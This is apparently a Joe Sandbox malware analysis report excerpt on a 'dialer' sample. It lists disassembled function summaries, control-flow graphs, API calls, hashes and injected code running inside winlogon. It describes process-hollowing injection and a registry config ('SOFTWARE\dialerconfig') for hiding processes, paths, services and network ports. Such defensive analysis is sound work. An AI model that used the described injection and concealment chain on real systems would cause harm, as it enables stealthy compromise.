                                                                          • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                                          • String ID: SOFTWARE$dialerstager$open
                                                                          • API String ID: 3276259517-3931493855
                                                                          • Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                          • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                                          • Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                          • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741
                                                                          Function 0000000140001C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154injectionthreadmemoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 280 140001c88-140001cb8 281 140001cbb-140001cc8 280->281 282 140001e8c-140001e91 281->282 283 140001cce-140001d25 CreateProcessW 281->283 282->281 286 140001e97 282->286 284 140001e88 283->284 285 140001d2b-140001d5a VirtualAllocEx 283->285 284->282 287 140001e5d-140001e60 285->287 288 140001d60-140001d7b WriteProcessMemory 285->288 289 140001e99-140001eb9 286->289 290 140001e62-140001e76 OpenProcess 287->290 291 140001e85 287->291 288->287 292 140001d81-140001d87 288->292 290->284 293 140001e78-140001e83 TerminateProcess 290->293 291->284 294 140001dd2-140001def VirtualAlloc 292->294 295 140001d89 292->295 293->284 294->287 296 140001df1-140001e07 GetThreadContext 294->296 297 140001d8c-140001dba WriteProcessMemory 295->297 296->287 299 140001e09-140001e2e WriteProcessMemory 296->299 297->287 298 140001dc0-140001dcc 297->298 298->297 300 140001dce 298->300 299->287 301 140001e30-140001e4c SetThreadContext 299->301 300->294 301->287 302 140001e4e-140001e5b ResumeThread 301->302 302->287 303 140001eba-140001ebf 302->303 303->289
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                          • String ID: @
                                                                          • API String ID: 3462610200-2766056989
                                                                          • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                          • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                                          • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                          • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                                          Function 00000001400019C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                          • String ID: dialersvc64
                                                                          • API String ID: 4184240511-3881820561
                                                                          • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                          • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                                          • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                          • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                                          Function 0000000140001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Delete$CloseEnumOpen
                                                                          • String ID: SOFTWARE\dialerconfig
                                                                          • API String ID: 3013565938-461861421
                                                                          • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                          • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                                          • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                          • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                                          Function 0000000140002A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: File$Write$CloseCreateHandle
                                                                          • String ID: \\.\pipe\dialercontrol_redirect64
                                                                          • API String ID: 148219782-3440882674
                                                                          • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                          • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                                          • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                          • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                                          Function 0000000140001914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: ntdll.dll
                                                                          • API String ID: 1646373207-2227199552
                                                                          • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                          • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                                          • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                          • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                                          Execution Graph

                                                                          Execution Coverage:1.3%
                                                                          Dynamic/Decrypted Code Coverage:94.4%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:107
                                                                          Total number of Limit Nodes:16
                                                                          execution_graph 22222 1e858985cf0 22223 1e858985cfd 22222->22223 22224 1e858985d09 22223->22224 22232 1e858985e1a 22223->22232 22225 1e858985d3e 22224->22225 22226 1e858985d8d 22224->22226 22227 1e858985d66 SetThreadContext 22225->22227 22227->22226 22228 1e858985e41 VirtualProtect FlushInstructionCache 22228->22232 22229 1e858985efe 22230 1e858985f1e 22229->22230 22244 1e8589843e0 VirtualFree 22229->22244 22240 1e858984df0 GetCurrentProcess 22230->22240 22232->22228 22232->22229 22234 1e858985f23 22235 1e858985f77 22234->22235 22236 1e858985f37 ResumeThread 22234->22236 22245 1e858987940 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry capture_previous_context 22235->22245 22237 1e858985f6b 22236->22237 22237->22234 22239 1e858985fbf 22243 1e858984e0c 22240->22243 22241 1e858984e22 VirtualProtect FlushInstructionCache 22241->22243 22242 1e858984e53 22242->22234 22243->22241 22243->22242 22244->22230 22245->22239 22246 1e85895273c 22247 1e85895276a 22246->22247 22248 1e8589527c5 VirtualAlloc 22247->22248 22250 1e8589528d4 22247->22250 22248->22250 22251 1e8589527ec 22248->22251 22249 1e858952858 LoadLibraryA 22249->22251 22251->22249 22251->22250 22252 1e8589828c8 22253 1e85898290e 22252->22253 22254 1e858982970 22253->22254 22256 1e858983844 22253->22256 22257 1e858983851 StrCmpNIW 22256->22257 22258 1e858983866 22256->22258 22257->22258 22258->22253 22259 1e858983ab9 22262 1e858983a06 22259->22262 22260 1e858983a70 22261 1e858983a56 VirtualQuery 22261->22260 22261->22262 22262->22260 22262->22261 22263 1e858983a8a VirtualAlloc 22262->22263 22263->22260 22264 1e858983abb GetLastError 22263->22264 22264->22260 22264->22262 22265 1e858981abc 22271 1e858981628 GetProcessHeap 22265->22271 22267 1e858981ad2 Sleep SleepEx 22269 1e858981acb 22267->22269 22269->22267 22270 1e858981598 StrCmpIW StrCmpW 22269->22270 22316 1e8589818b4 9 API calls 22269->22316 22270->22269 22272 1e858981648 __free_lconv_mon 22271->22272 22317 1e858981268 GetProcessHeap 22272->22317 22274 1e858981650 22275 1e858981268 2 API calls 22274->22275 22276 1e858981661 22275->22276 22277 1e858981268 2 API calls 22276->22277 22278 1e85898166a 22277->22278 22279 1e858981268 2 API calls 22278->22279 22280 1e858981673 22279->22280 22281 1e85898168e RegOpenKeyExW 22280->22281 22282 1e8589816c0 RegOpenKeyExW 22281->22282 22283 1e8589818a6 22281->22283 22284 1e8589816e9 22282->22284 22285 1e8589816ff RegOpenKeyExW 22282->22285 22283->22269 22328 1e8589812bc 11 API calls __free_lconv_mon 22284->22328 22287 1e858981723 22285->22287 22288 1e85898173a RegOpenKeyExW 22285->22288 22321 1e85898104c RegQueryInfoKeyW 22287->22321 22290 1e858981775 RegOpenKeyExW 22288->22290 22291 1e85898175e 22288->22291 22295 1e8589817b0 RegOpenKeyExW 22290->22295 22296 1e858981799 22290->22296 22329 1e8589812bc 11 API calls __free_lconv_mon 22291->22329 22292 1e8589816f5 RegCloseKey 22292->22285 22299 1e8589817d4 22295->22299 22300 1e8589817eb RegOpenKeyExW 22295->22300 22330 1e8589812bc 11 API calls __free_lconv_mon 22296->22330 22297 1e85898176b RegCloseKey 22297->22290 22331 1e8589812bc 11 API calls __free_lconv_mon 22299->22331 22303 1e858981826 RegOpenKeyExW 22300->22303 22304 1e85898180f 22300->22304 22301 1e8589817a6 RegCloseKey 22301->22295 22306 1e858981861 RegOpenKeyExW 22303->22306 22307 1e85898184a 22303->22307 22305 1e85898104c 4 API calls 22304->22305 22309 1e85898181c RegCloseKey 22305->22309 22311 1e858981885 22306->22311 22312 1e85898189c RegCloseKey 22306->22312 22310 1e85898104c 4 API calls 22307->22310 22308 1e8589817e1 RegCloseKey 22308->22300 22309->22303 22313 1e858981857 RegCloseKey 22310->22313 22314 1e85898104c 4 API calls 22311->22314 22312->22283 22313->22306 22315 1e858981892 RegCloseKey 22314->22315 22315->22312 22332 1e858996168 22317->22332 22319 1e858981283 GetProcessHeap 22320 1e8589812ae __free_lconv_mon 22319->22320 22320->22274 22322 1e8589811b5 RegCloseKey 22321->22322 22323 1e8589810bf 22321->22323 22322->22288 22323->22322 22324 1e8589810cf RegEnumValueW 22323->22324 22326 1e858981125 __free_lconv_mon 22324->22326 22325 1e85898114e GetProcessHeap 22325->22326 22326->22322 22326->22324 22326->22325 22327 1e85898116e GetProcessHeap 22326->22327 22327->22326 22328->22292 22329->22297 22330->22301 22331->22308 22333 1e85898554d 22335 1e858985554 22333->22335 22334 1e8589855bb 22335->22334 22336 1e858985637 VirtualProtect 22335->22336 22337 1e858985671 22336->22337 22338 1e858985663 GetLastError 22336->22338 22338->22337 22339 1e8589b273c 22340 1e8589b276a 22339->22340 22341 1e8589b27c5 VirtualAlloc 22340->22341 22342 1e8589b27ec 22340->22342 22341->22342

                                                                          Executed Functions

                                                                          Function 000001E858981628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                          • API String ID: 106492572-2879589442
                                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction ID: 21d86d412d1650ae27b0043b2d401094e46d8c624b6cd0b43ec9435d42789ffa
                                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction Fuzzy Hash: 2D710A36321A91C6EB10AF66E8916EDB3A5FF84B98F401132DE4E57B69EF38C454C740
                                                                          Function 000001E858983790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                          • String ID: wr
                                                                          • API String ID: 1092925422-2678910430
                                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction ID: d234e4461be7ce666b4697da3425b0a366aa51e2e4cc7be98c343ce9cae75724
                                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction Fuzzy Hash: 05115B36724BC1C2EF159B22E4086ADB2A1FB88B85F44003ADE8E07794EF3DC505CB04
                                                                          Function 000001E858985B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 59 1e858985b30-1e858985b57 60 1e858985b59-1e858985b68 59->60 61 1e858985b6b-1e858985b76 GetCurrentThreadId 59->61 60->61 62 1e858985b82-1e858985b89 61->62 63 1e858985b78-1e858985b7d 61->63 65 1e858985b9b-1e858985baf 62->65 66 1e858985b8b-1e858985b96 call 1e858985960 62->66 64 1e858985faf-1e858985fc6 call 1e858987940 63->64 69 1e858985bbe-1e858985bc4 65->69 66->64 72 1e858985c95-1e858985cb6 69->72 73 1e858985bca-1e858985bd3 69->73 77 1e858985cbc-1e858985cdc GetThreadContext 72->77 78 1e858985e1f-1e858985e30 call 1e8589874bf 72->78 75 1e858985bd5-1e858985c18 call 1e8589885c0 73->75 76 1e858985c1a-1e858985c8d call 1e858984510 call 1e8589844b0 call 1e858984470 73->76 88 1e858985c90 75->88 76->88 81 1e858985ce2-1e858985d03 77->81 82 1e858985e1a 77->82 93 1e858985e35-1e858985e3b 78->93 81->82 91 1e858985d09-1e858985d12 81->91 82->78 88->69 95 1e858985d92-1e858985da3 91->95 96 1e858985d14-1e858985d25 91->96 97 1e858985e41-1e858985e98 VirtualProtect FlushInstructionCache 93->97 98 1e858985efe-1e858985f0e 93->98 99 1e858985e15 95->99 100 1e858985da5-1e858985dc3 95->100 102 1e858985d27-1e858985d3c 96->102 103 1e858985d8d 96->103 106 1e858985ec9-1e858985ef9 call 1e8589878ac 97->106 107 1e858985e9a-1e858985ea4 97->107 104 1e858985f10-1e858985f17 98->104 105 1e858985f1e-1e858985f2a call 1e858984df0 98->105 100->99 108 1e858985dc5-1e858985e0c call 1e858983900 100->108 102->103 110 1e858985d3e-1e858985d88 call 1e858983970 SetThreadContext 102->110 103->99 104->105 111 1e858985f19 call 1e8589843e0 104->111 122 1e858985f2f-1e858985f35 105->122 106->93 107->106 113 1e858985ea6-1e858985ec1 call 1e858984390 107->113 108->99 124 1e858985e10 call 1e8589874dd 108->124 110->103 111->105 113->106 125 1e858985f77-1e858985f95 122->125 126 1e858985f37-1e858985f75 ResumeThread call 1e8589878ac 122->126 124->99 128 1e858985f97-1e858985fa6 125->128 129 1e858985fa9 125->129 126->122 128->129 129->64
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Current$Context
                                                                          • String ID:
                                                                          • API String ID: 1666949209-0
                                                                          • Opcode ID: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                                          • Instruction ID: a4617b46cd32b3a0414ab7f2d2c5e1ab313b6a71b2cba704dad36ec99b28e09a
                                                                          • Opcode Fuzzy Hash: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                                          • Instruction Fuzzy Hash: 9DD17776214B89C6DB709B56E49439EB7A0FB88B84F500126EE8D47BA9DF3CC545CF40
                                                                          Function 000001E8589850D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 131 1e8589850d0-1e8589850fc 132 1e85898510d-1e858985116 131->132 133 1e8589850fe-1e858985106 131->133 134 1e858985127-1e858985130 132->134 135 1e858985118-1e858985120 132->135 133->132 136 1e858985141-1e85898514a 134->136 137 1e858985132-1e85898513a 134->137 135->134 138 1e858985156-1e858985161 GetCurrentThreadId 136->138 139 1e85898514c-1e858985151 136->139 137->136 141 1e858985163-1e858985168 138->141 142 1e85898516d-1e858985174 138->142 140 1e8589856d3-1e8589856da 139->140 141->140 143 1e858985181-1e85898518a 142->143 144 1e858985176-1e85898517c 142->144 145 1e858985196-1e8589851a2 143->145 146 1e85898518c-1e858985191 143->146 144->140 147 1e8589851a4-1e8589851c9 145->147 148 1e8589851ce-1e858985225 call 1e8589856e0 * 2 145->148 146->140 147->140 153 1e858985227-1e85898522e 148->153 154 1e85898523a-1e858985243 148->154 155 1e858985230 153->155 156 1e858985236 153->156 157 1e858985255-1e85898525e 154->157 158 1e858985245-1e858985252 154->158 159 1e8589852b0-1e8589852b6 155->159 160 1e8589852a6-1e8589852aa 156->160 161 1e858985260-1e858985270 157->161 162 1e858985273-1e858985298 call 1e858987870 157->162 158->157 163 1e8589852e5-1e8589852eb 159->163 164 1e8589852b8-1e8589852d4 call 1e858984390 159->164 160->159 161->162 172 1e85898532d-1e858985342 call 1e858983cc0 162->172 173 1e85898529e 162->173 167 1e858985315-1e858985328 163->167 168 1e8589852ed-1e85898530c call 1e8589878ac 163->168 164->163 174 1e8589852d6-1e8589852de 164->174 167->140 168->167 178 1e858985351-1e85898535a 172->178 179 1e858985344-1e85898534c 172->179 173->160 174->163 180 1e85898536c-1e8589853ba call 1e858988c60 178->180 181 1e85898535c-1e858985369 178->181 179->160 184 1e8589853c2-1e8589853ca 180->184 181->180 185 1e8589853d0-1e8589854bb call 1e858987440 184->185 186 1e8589854d7-1e8589854df 184->186 198 1e8589854bd 185->198 199 1e8589854bf-1e8589854ce call 1e858984060 185->199 188 1e8589854e1-1e8589854f4 call 1e858984590 186->188 189 1e858985523-1e85898552b 186->189 200 1e8589854f6 188->200 201 1e8589854f8-1e858985521 188->201 190 1e858985537-1e858985546 189->190 191 1e85898552d-1e858985535 189->191 196 1e858985548 190->196 197 1e85898554f 190->197 191->190 195 1e858985554-1e858985561 191->195 203 1e858985563 195->203 204 1e858985564-1e8589855b9 call 1e8589885c0 195->204 196->197 197->195 198->186 207 1e8589854d0 199->207 208 1e8589854d2 199->208 200->189 201->186 203->204 210 1e8589855c8-1e858985661 call 1e858984510 call 1e858984470 VirtualProtect 204->210 211 1e8589855bb-1e8589855c3 204->211 207->186 208->184 216 1e858985671-1e8589856d1 210->216 217 1e858985663-1e858985668 GetLastError 210->217 216->140 217->216
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                                          • Instruction ID: fa7807662b3792369c97fc6f37bebb2b001074cd7c6065ce50333d33d1213250
                                                                          • Opcode Fuzzy Hash: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                                          • Instruction Fuzzy Hash: 11029436229BC5C6EB60CB59E49079EB7A1F785794F104026EA8E87BA9DF7CC454CF00
                                                                          Function 000001E8589839E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$AllocQuery
                                                                          • String ID:
                                                                          • API String ID: 31662377-0
                                                                          • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                          • Instruction ID: 5ad133b89d074dd97bec0c1f73fb02c24c1f243091b434175b3c7d6c02ead25a
                                                                          • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                          • Instruction Fuzzy Hash: E531EC32239AC5C1EA70DA15E85539EF6A4FB88784F500536EACE46BA8DF7DC5809F04
                                                                          Function 000001E85898328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                          • String ID:
                                                                          • API String ID: 1683269324-0
                                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction ID: 9367effade6da1e612e9811c82477e14b03a08a888ac1948d4cbee7ffa7af72d
                                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction Fuzzy Hash: F41152716346C2C2FB60AB62F8493DDF294BF54385F90413FAD4E82995EF7CC0849A10
                                                                          Function 000001E858984DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284398049.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 3733156554-0
                                                                          • Opcode ID: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                          • Instruction ID: 5a9e8cf37d9f90f00b28642c3c3ed99c7679eb8f6b8d0d5ae9ec7e4d6c0d13b2
                                                                          • Opcode Fuzzy Hash: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                          • Instruction Fuzzy Hash: DFF01D76228B85C1D630DB51E44038EBBA0FB887D4F140122BE8D43B69CE3CC5808F00
                                                                          Function 000001E85895273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 265 1e85895273c-1e8589527a4 call 1e8589529d4 * 4 274 1e8589527aa-1e8589527ad 265->274 275 1e8589529b2 265->275 274->275 276 1e8589527b3-1e8589527b6 274->276 277 1e8589529b4-1e8589529d0 275->277 276->275 278 1e8589527bc-1e8589527bf 276->278 278->275 279 1e8589527c5-1e8589527e6 VirtualAlloc 278->279 279->275 280 1e8589527ec-1e85895280c 279->280 281 1e85895280e-1e858952836 280->281 282 1e858952838-1e85895283f 280->282 281->281 281->282 283 1e8589528df-1e8589528e6 282->283 284 1e858952845-1e858952852 282->284 285 1e8589528ec-1e858952901 283->285 286 1e858952992-1e8589529b0 283->286 284->283 287 1e858952858-1e85895286a LoadLibraryA 284->287 285->286 288 1e858952907 285->288 286->277 289 1e85895286c-1e858952878 287->289 290 1e8589528ca-1e8589528d2 287->290 293 1e85895290d-1e858952921 288->293 294 1e8589528c5-1e8589528c8 289->294 290->287 291 1e8589528d4-1e8589528d9 290->291 291->283 296 1e858952923-1e858952934 293->296 297 1e858952982-1e85895298c 293->297 294->290 295 1e85895287a-1e85895287d 294->295 301 1e85895287f-1e8589528a5 295->301 302 1e8589528a7-1e8589528b7 295->302 299 1e85895293f-1e858952943 296->299 300 1e858952936-1e85895293d 296->300 297->286 297->293 304 1e85895294d-1e858952951 299->304 305 1e858952945-1e85895294b 299->305 303 1e858952970-1e858952980 300->303 306 1e8589528ba-1e8589528c1 301->306 302->306 303->296 303->297 308 1e858952963-1e858952967 304->308 309 1e858952953-1e858952961 304->309 305->303 306->294 308->303 310 1e858952969-1e85895296c 308->310 309->303 310->303
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3284181890.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: AllocLibraryLoadVirtual
                                                                          • String ID:
                                                                          • API String ID: 3550616410-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: 664efa2306450b3d651c980b7901db96b5cccce9d6076fff7dea8f6b8d110b4a
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
